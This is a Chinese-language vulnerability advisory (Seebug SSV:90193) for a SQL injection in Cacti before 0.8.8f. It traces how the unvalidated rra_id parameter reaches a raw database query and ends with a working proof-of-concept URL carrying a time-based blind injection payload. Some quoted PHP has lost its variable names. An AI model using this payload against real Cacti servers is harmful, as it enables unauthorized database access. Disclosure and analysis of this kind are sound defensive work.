Cacti SQL注入漏洞(CNVD-2015-08486)

2015-12-30T00:00:00
ID SSV:90193
Type seebug
Reporter Root
Modified 2015-12-30T00:00:00

Description

0x01 漏洞简述

Cacti是Cacti集团的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。

Cacti 0.8.8f以前版本存在SQL注入漏洞。允许远程攻击者通过graphphp属性行动中的rra_id参数执行任意SQL命令。

0x02 漏洞细节

漏洞存在于文件 /cacti-0.8.8f/graph.php

line 25

``` include_once("./include/top_graph_header.php"); / set default action / if (!isset(["action"])) { ["action"] = "view"; } if (!isset(["view_type"])) { ["view_type"] = ""; }

= true; include("./include/auth.php"); include_once("./lib/rrd.php");

api_plugin_hook_function('graph');

include_once("./lib/html_tree.php"); include_once("./include/top_graph_header.php");

/ ================= input validation ================= / input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$"); input_validate_input_number(get_request_var("local_graph_id")); input_validate_input_number(get_request_var("graph_end")); input_validate_input_number(get_request_var("graph_start")); input_validate_input_regex(get_request_var_request("view_type"), "^([a-zA-Z0-9]+)$"); / ==================================================== /

```

/cacti-0.8.8f/include/top_graph_header.php

line 30 rra_id 参数未验证

/* ================= input validation ================= */ input_validate_input_number(get_request_var_request("local_graph_id")); input_validate_input_number(get_request_var_request("graph_start")); input_validate_input_number(get_request_var_request("graph_end")); /* ==================================================== */

继续跟踪

line 158 <?php if ((basename($_SERVER["PHP_SELF"]) == "graph.php") && ($_REQUEST["action"] == "properties")) {?> <tr> <td valign="top" class='cactiTreeNavigationArea' colspan="3"> <?php $graph_data_array["print_source"] = true;

        /* override: graph start time (unix time) */
        if (!empty($_GET["graph_start"])) {
            $graph_data_array["graph_start"] = get_request_var_request("graph_start");
        }

        /* override: graph end time (unix time) */
        if (!empty($_GET["graph_end"])) {
            $graph_data_array["graph_end"] = get_request_var_request("graph_end");
        }

        print trim(@rrdtool_function_graph(get_request_var_request("local_graph_id"), get_request_var_request("rra_id"), $graph_data_array));
        ?&gt;

\cacti-0.8.8f\lib\rrd.php function rrdtool_function_graph line 631 $rra["timespan"] = 86400; }else{ / get a list of RRAs related to this graph / $rras = get_associated_rras($local_graph_id);

        if (sizeof($rras) &gt; 0) {
            foreach ($rras as $unchosen_rra) {
                /* the timespan specified in the RRA "timespan" field may not be accurate */
                $real_timespan = ($ds_step * $unchosen_rra["steps"] * $unchosen_rra["rows"]);

                /* make sure the current start/end times fit within each RRA's timespan */
                if ( (($graph_data_array["graph_end"] - $graph_data_array["graph_start"]) &lt;= $real_timespan) && ((time() - $graph_data_array["graph_start"]) &lt;= $real_timespan) ) {
                    /* is this RRA better than the already chosen one? */
                    if ((isset($rra)) && ($unchosen_rra["steps"] &lt; $rra["steps"])) {
                        $rra = $unchosen_rra;
                    }else if (!isset($rra)) {
                        $rra = $unchosen_rra;
                    }
                }
            }
        }

        if (!isset($rra)) {
            $rra["rows"] = 600;
            $rra["steps"] = 1;
        }
    }
}else{
// sql injection here 
    $rra = db_fetch_row("select timespan,rows,steps from rra where id=$rra_id");
}

利用方式:

http://192.168.x.x/cacti/graph.php?action=properties&local_graph_id=1&rra_id=1%20and%20benchmark(20000000%2csha1(1))--%20&view_type=&graph_start=1448274676&graph_end=1448360776

0x03 参考链接

FULLDISC:20151209 [CVE-2015-8369] Cacti SQL injection in graph.php

URL:http://seclists.org/fulldisclosure/2015/Dec/8

MISC:http://bugs.cacti.net/view.php?id=2646